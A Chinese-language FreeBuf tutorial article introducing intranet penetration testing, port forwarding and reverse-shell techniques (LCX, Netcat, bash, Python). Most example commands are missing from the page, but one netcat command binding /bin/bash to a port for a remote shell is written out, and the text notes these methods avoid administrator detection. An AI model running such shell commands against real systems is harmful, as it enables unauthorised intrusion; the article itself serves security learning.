渗透测试,是一个非常宽泛的概念,主要是指渗透测试人员从一个攻击者的角度出发,检查目标系统的安全性。其根本目的是获取webshell,从而可以进行有关渗透测试的操作。
安全渗透作为一种进行信息安全风险评估的一种手段,其渗透的过程可以分为三个阶段:
1. 信息收集
信息收集阶段,主要获取目的网站的外部信息,包括域名信息,IP信息,CDN信息等等。
2. 前渗透:
前渗透即获取权限之前的渗透行为。这一阶段主要目的是寻找可利用的漏洞,以获取shell。
3. 后渗透
后渗透即获取权限之后的渗透行为。
内网渗透属于后渗透的一部分,由于最近在整理内网渗透的相关内容,所以想要先来介绍一下内网渗透的内容。想要进行内网渗透在内的安全渗透,所需的知识多而杂。想要成为一个合格的从业者,需要学习的内容会比较零散,不成体系。多种多样,千变万化的渗透技巧,又经常让人感到非常混乱。所以我计划将内网渗透的内容整理成一系列文章,希望可以帮到对此感兴趣的人。如果我理解的内容出现偏差和错误,希望大家可以指出。
内网渗透的主要流程:
1. 内网信息收集
2. 获取shell
3. 提权
在渗透过程中,想要直接在目标机服务器内部进行操作,有可能需要经过几次跳转,这会导致我们在内网的操作非常慢,也很容易被管理员发现。将shell转发到外网的话,执行命令的速度会稍微快一点,也更加隐蔽。因此获取shell会让我们的操作便利很多。
端口转发的两个概念
1. 正向转发:
攻击者连接被攻击者机器,可用于攻击者处于内网,被攻击者处于公网的情况。
2. 反向转发:
被攻击者主动连接攻击者,可用于攻击者处于外网,被攻击者处于内网的情况。
内网转发的经典姿势
1 LCX端口转发
公网机器上利用Lcx进行监听,监听1234端口,并转发到50386端口。50386是监听主机未被占用的端口。
将内网远程连接端口转发到监听主机开放端口的。
利用远程桌面连接127.0.0.1:50386。
2 Netcat反弹shell
第一种情况
a) 远程主机(注:假设IP地址为 192.168.85.136)上运行 :nc -l -p 1998 -t-e /bin/bash 192.168.85.138
意为绑定远程主机的 bash到1998端口,当本地主机连接远程主机成功时就会返回给本地主机一个terminal。
b) 在本地主机上运行 nc 192.168.85.136 1998,连接已经将 termimal重定向到 1998 端口的远程主机。远程主机ip为192.168.85.136。
第二种情况
a) 在windows主机执行
b) Linux端弹出shell
3 bash反弹shell
远程:
0>&1就是把0对应的设备改成的1对应的设备。
本地:
本地利用nc监听2018端口。
4. Python一句话反弹shell
本地,利用nc监听1998端口,获得shell
在目的服务器执行python脚本,转发shell。
反弹shell之后,就可以尝试内网渗透或提权的操作啦!
不管那种方式,反弹shell的过程都差不多:打开服务器的端口,用本地主机连接远程主机的端口。或者是把远程主机的端口转发到本地主机。不管哪种方式,都是对端口进行操作,主要需要理解原理,大家也可以尝试创造新的弹shell操作。
安全渗透的方式千变万化,并没有固定的套路,我这里只提出其中几种作为样例,希望通过这几个样例,可以让大家对端口转发操作有一个较直观的认识。
*本文作者:EVA。本文属北京丁牛科技原创出品,转载请注明来自FreeBuf.COM。
来源:freebuf.com 2018-07-26 19:13:35 by: DigApis
请登录后发表评论
注册